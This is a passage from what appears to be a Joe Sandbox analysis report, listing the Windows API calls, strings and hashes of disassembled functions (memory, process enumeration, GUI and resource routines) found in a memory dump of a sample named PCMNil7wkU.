API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b31c84fa486ee8afa5c79da355c4ba3b33e389e1deaa6bde3fd4c85b0959324a
Instruction ID: e9152fabd60af9f58bf60b476c595dd0b575438548716b55d928a3bea49406bf
Opcode Fuzzy Hash: b31c84fa486ee8afa5c79da355c4ba3b33e389e1deaa6bde3fd4c85b0959324a
Instruction Fuzzy Hash: 1AF0ECF07213009BEB0ADF7A9D847017AD2EB89344F148179D615DB2D4EBB99C418B10

Uniqueness

Uniqueness Score: -1.00%

Function 0410171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,0410209C), ref: 04101740

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 207d7e42526b5b6aaede94de6c1a42d96faf196252d8527f889bdd47f4a0ef78
Instruction ID: 082189e96d468a481322b4442f9e2a1a23a10350fe3eb7ea23ffe22949950b64
Opcode Fuzzy Hash: 207d7e42526b5b6aaede94de6c1a42d96faf196252d8527f889bdd47f4a0ef78
Instruction Fuzzy Hash: E4F09AF2A016557BE7118E9A9CC0B82BB94FB00364F054139FA489B384DBBAAC408B94

Uniqueness

Uniqueness Score: -1.00%

Function 04101782 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,04102080), ref: 041017A0

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ef25cd7fb40bae38c42fcc6c4e4ca98ac9458e1212ff59d12b9ab878d0c4f9d1
Instruction ID: bff206e01f549bd97d433d5d40e807c044c8637d596eb4c4fb7db865f1779dd8
Opcode Fuzzy Hash: ef25cd7fb40bae38c42fcc6c4e4ca98ac9458e1212ff59d12b9ab878d0c4f9d1
Instruction Fuzzy Hash: AEE046753013017EE7101EBA4DC0B52AAD8EB487A5F2884A9F641DB281DBE9BC008BA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04158820 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,04158AA7,?,?,04158B39,00000000,04158C15), ref: 04158834
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0415884C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0415885E
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 04158870
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 04158882
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 04158894
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 041588A6
GetProcAddress.KERNEL32(00000000,Process32First), ref: 041588B8
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 041588CA
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 041588DC
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 041588EE
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 04158900
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 04158912
GetProcAddress.KERNEL32(00000000,Module32First), ref: 04158924
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 04158936
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 04158948
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0415895A

Strings

Module32First, xrefs: 0415891C
Module32Next, xrefs: 0415892E
Module32FirstW, xrefs: 04158940
Thread32First, xrefs: 041588F8
Module32NextW, xrefs: 04158952
Heap32ListFirst, xrefs: 04158856
Toolhelp32ReadProcessMemory, xrefs: 0415889E
CreateToolhelp32Snapshot, xrefs: 04158844
Process32Next, xrefs: 041588C2
Heap32Next, xrefs: 0415888C
kernel32.dll, xrefs: 0415882F
Heap32ListNext, xrefs: 04158868
Process32FirstW, xrefs: 041588D4
Thread32Next, xrefs: 0415890A
Heap32First, xrefs: 0415887A
Process32NextW, xrefs: 041588E6
Process32First, xrefs: 041588B0

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: ab5e186430cb189cd95ca6742ca0ccde66ca5b3a026c5b1ab990bbe2463c447a
Instruction ID: 7cecf7f35c64a12894cce160b619a11a976fc6dedcfec0faa2b8d4bb9f3ffaf9
Opcode Fuzzy Hash: ab5e186430cb189cd95ca6742ca0ccde66ca5b3a026c5b1ab990bbe2463c447a
Instruction Fuzzy Hash: 003187B0A40790EFEF04EBA598C6BA537E8EF457447004565E824CF254DBB9ACA8CF16

Uniqueness

Uniqueness Score: -1.00%

Function 04124F7C Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 04124FFC
GetDC.USER32(00000000), ref: 0412500D
CreateCompatibleDC.GDI32(00000000), ref: 0412501E
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0412506A
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0412508E
SelectObject.GDI32(?,?), ref: 041252EB
SelectPalette.GDI32(?,00000000,00000000), ref: 0412532B
RealizePalette.GDI32(?), ref: 04125337
SetTextColor.GDI32(?,00000000), ref: 041253A0
SetBkColor.GDI32(?,00000000), ref: 041253BA
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,04125548,?,00000000,0412556A,?,00000000,0412557B), ref: 04125402
FillRect.USER32(?,?,00000000), ref: 04125388

Part of subcall function 04121CEC: GetSysColor.USER32(?), ref: 04121CF6

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 04125424
CreateCompatibleDC.GDI32(00000028), ref: 04125437
SelectObject.GDI32(?,00000000), ref: 0412545A
SelectPalette.GDI32(?,00000000,00000000), ref: 04125476
RealizePalette.GDI32(?), ref: 04125481
SetTextColor.GDI32(?,00000000), ref: 0412549F
SetBkColor.GDI32(?,00000000), ref: 041254B9
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 041254E1
SelectPalette.GDI32(?,00000000,000000FF), ref: 041254F3
SelectObject.GDI32(?,00000000), ref: 041254FD
DeleteDC.GDI32(?), ref: 04125518

Part of subcall function 04122AA8: CreateBrushIndirect.GDI32(?), ref: 04122B53

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: d4317065e24dc35d8d48c90fcc4380d8ad4c5a298f2e633e4f98fe2226a7db93
Instruction ID: 260082845147ec2d93d907ce7a90f55ec00ccb1fe80581fce279c9f1e85f76d0
Opcode Fuzzy Hash: d4317065e24dc35d8d48c90fcc4380d8ad4c5a298f2e633e4f98fe2226a7db93
Instruction Fuzzy Hash: 7712E675A00219AFEB10EFA8CAC4F9EB7F9EB08314F118455F918EB291D775E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0415319C Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 0415359D
RegisterAutomation, xrefs: 041535BE

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: c2522029c941f133d304675ea2e157d7feda6d2a5ff370a1dd09060936bfe8cf
Instruction ID: 36c1d35cc5f34daadfd5dbf79a6b1aa4c8c9d76e2a0d488e7383e92d6d76d3b1
Opcode Fuzzy Hash: c2522029c941f133d304675ea2e157d7feda6d2a5ff370a1dd09060936bfe8cf
Instruction Fuzzy Hash: B7E13B35A44208EFEB18DBA8C5C4ADDB7B5AB04394F1582A5EC359B2B5D730FE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04105C18 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,04107A18,04100000,0416A794), ref: 04105C35
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 04105C4C
lstrcpynA.KERNEL32(?,?,?), ref: 04105C7C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105CE0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D16
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D29
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D3B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000,0416A794), ref: 04105D47
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18,04100000), ref: 04105D7B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,04107A18), ref: 04105D87
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 04105DA9

Strings

kernel32.dll, xrefs: 04105C30
\, xrefs: 04105D59
GetLongPathNameA, xrefs: 04105C43

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: e445b7aab81a7b91a3929b89dc50a0f25977857ab174a3c41df27fc5d5c69405
Instruction ID: a3187dbc7c438a07edd1a9772ebc03d771bcb498d778051d4487ac8204fe9836
Opcode Fuzzy Hash: e445b7aab81a7b91a3929b89dc50a0f25977857ab174a3c41df27fc5d5c69405
Instruction Fuzzy Hash: E4415E72D00659BFDB10DEE8CCC8ADEB7FEAF48304F1485A6A555E7280D7B4AA448F50

Uniqueness

Uniqueness Score: -1.00%

Function 0414FCD8 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 392b843be54b4c958587514d350ba550f603e590ba17a9e157ce56c2f1ccd237
Instruction ID: 4b5506c1270ef107da0265da85dd140d0e046d409131f699947cab7ade83a7bc
Opcode Fuzzy Hash: 392b843be54b4c958587514d350ba550f603e590ba17a9e157ce56c2f1ccd237
Instruction Fuzzy Hash: CA024931B04244EFEB11EFA8D9C5B9D7BF4AF48304F1640A0E914AB3A1DB75BE819B50

Uniqueness

Uniqueness Score: -1.00%

Function 04105EE8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04105EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 04105F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04105F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 04105F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 04105FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 04105FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 04105E48
Software\Borland\Locales, xrefs: 04105E0C, 04105E2A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction ID: 62b3a01b5876f77d37a0394ebbcd61c38e7cbbf65f2d507301fc079a399661fb
Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction Fuzzy Hash: F6317771E4025C3AFB25D9B8DCCABEE7BAD9B04344F4481E1A644E61C5D7F8AB448F50

Uniqueness

Uniqueness Score: -1.00%

Function 0414224C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0414225B
GetWindowPlacement.USER32(?,0000002C), ref: 04142278
GetWindowRect.USER32(?), ref: 04142291
GetWindowLongA.USER32(?,000000F0), ref: 0414229F
GetWindowLongA.USER32(?,000000F8), ref: 041422B4
ScreenToClient.USER32(00000000), ref: 041422C1
ScreenToClient.USER32(00000000,?), ref: 041422CC

Strings

,, xrefs: 04142264

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction ID: b9c01c33a93ba63d3236c8b9c8af5b5fab4768fabf93704f692366d78826289f
Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction Fuzzy Hash: 1F115E71604341AFDB10EFACC8C4E8B77D8AF49354F048AA5BE68DB285D771F8408B61

Uniqueness

Uniqueness Score: -1.00%

Function 04133E00 Relevance: 10.9, APIs: 7, Instructions: 405COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 041340D0
RestoreDC.GDI32(?,?), ref: 04134144
GetWindowDC.USER32(?,00000000,04134334), ref: 041341BE
SaveDC.GDI32(?), ref: 041341F5
RestoreDC.GDI32(?,?), ref: 04134262
DefWindowProcA.USER32(?,?,?,?,00000000,04134334), ref: 04134316

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: RestoreSaveWindow$Proc
String ID:
API String ID: 1975259465-0
Opcode ID: 7c20a09d5c387e8a6e346fbdcb919c38755e6a2c0582c81db17837d07a9dc359
Instruction ID: 2a1fa75cfa5ba7dabb75f326fc2a45d46fde3529e0c572da56c77c28e49314c7
Opcode Fuzzy Hash: 7c20a09d5c387e8a6e346fbdcb919c38755e6a2c0582c81db17837d07a9dc359
Instruction Fuzzy Hash: 37E12334A04219DFEB10EFA9C9C09AEB7F5EF98305B2586A5E815A7360DB34FD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0414C508 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 0414C5CF
SaveDC.GDI32(?), ref: 0414C78D
RestoreDC.GDI32(?,?), ref: 0414C7FE
GetWindowDC.USER32(00000000), ref: 0414C86A
SaveDC.GDI32(?), ref: 0414C8A1
RestoreDC.GDI32(?,?), ref: 0414C905

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 912ac8e6ad48e9ea3b514a65d347b16450b3913e6186fbe9dc20ff6f6dd12efd
Instruction ID: b428665e0e11234eb5bbcc78ee46423ea0415ae2bcfa1e49360fe1c00443c110
Opcode Fuzzy Hash: 912ac8e6ad48e9ea3b514a65d347b16450b3913e6186fbe9dc20ff6f6dd12efd
Instruction Fuzzy Hash: C7C13B31B01104AFDB15DFA8C5C9ABEB7F5EB84314F1684A5E804AB295EB34FE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04153990 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 04153998
SetActiveWindow.USER32(?,?,?,?,04153392,00000000,04153866), ref: 041539A9
IsWindowEnabled.USER32(00000000), ref: 041539CC
DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,04153392,00000000,04153866), ref: 041539E5
SetWindowPos.USER32(?,00000000,00000000,?,?,04153392,00000000,04153866), ref: 04153A2B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,04153392,00000000,04153866), ref: 04153A79

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$ActiveEnabledFocusIconicProc
String ID:
API String ID: 848842217-0
Opcode ID: 47918aecbb41e326ccb4a240e49c72391077084516b10885629b76ad1052ae33
Instruction ID: 51c9e1b6127a9314d2af95dec4a82351a8181bd8503d192812bc45abad7bf776
Opcode Fuzzy Hash: 47918aecbb41e326ccb4a240e49c72391077084516b10885629b76ad1052ae33
Instruction Fuzzy Hash: 5D313E71700244DBEB25AE68CDC5BA93798AF04748F0810A5FE24DF2E6DBB5F8848754

Uniqueness

Uniqueness Score: -1.00%

Function 04141920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0414195F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0414197D
GetWindowPlacement.USER32(?,0000002C), ref: 041419B3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 041419D7

Strings

,, xrefs: 041419A1

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction ID: 2d047a1f1e34cdd315a032f27b9ac0bd46c0b48a7d8b4baf158d19ad04c90b4a
Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction Fuzzy Hash: 48213C71600204ABDF14EFA9C8C4ADA77A9AF89314F0485B5FE18DF24AD771F945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 041538CC Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 041538D3
SetActiveWindow.USER32(?,?,?,04153385,00000000,04153866), ref: 041538EB

Part of subcall function 04152F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 04152F82
Part of subcall function 04152F58: ShowOwnedPopups.USER32(00000000,?), ref: 04152FB1

IsWindowEnabled.USER32(00000000), ref: 04153917
SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04153385,00000000,04153866), ref: 0415394A
DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04153385), ref: 0415395F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
String ID:
API String ID: 2995439034-0
Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction ID: a986509fe6a08ad6125718c6aecae4eb654a7ed6c1e8e2d3b3132bd904749300
Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction Fuzzy Hash: 4511ECB17042449BEB54EE6DC9C5B9577A8AF44348F0840E4BE24DF1EAD775F885C720

Uniqueness

Uniqueness Score: -1.00%

Function 0412AEA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 0412AEB7

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 1a57ab64732fd61d23ff09a70fab8058cce45129d4a2855a176891891ace0a7a
Instruction ID: f8218b6b92f4884d3635102fe901009b156d30afd8e675fc82fa69daf276d8d2
Opcode Fuzzy Hash: 1a57ab64732fd61d23ff09a70fab8058cce45129d4a2855a176891891ace0a7a
Instruction Fuzzy Hash: 460181727001686BAB40EE949EC09FFB39CEF062D4B444051E920E7281EB3CBD6697B1

Uniqueness

Uniqueness Score: -1.00%

Function 0411A27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0411A293
LoadResource.KERNEL32(?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000,?), ref: 0411A2AD
SizeofResource.KERNEL32(?,0411A318,?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000,?), ref: 0411A2C7
LockResource.KERNEL32(04119E88,00000000,?,0411A318,?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000), ref: 0411A2D1

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

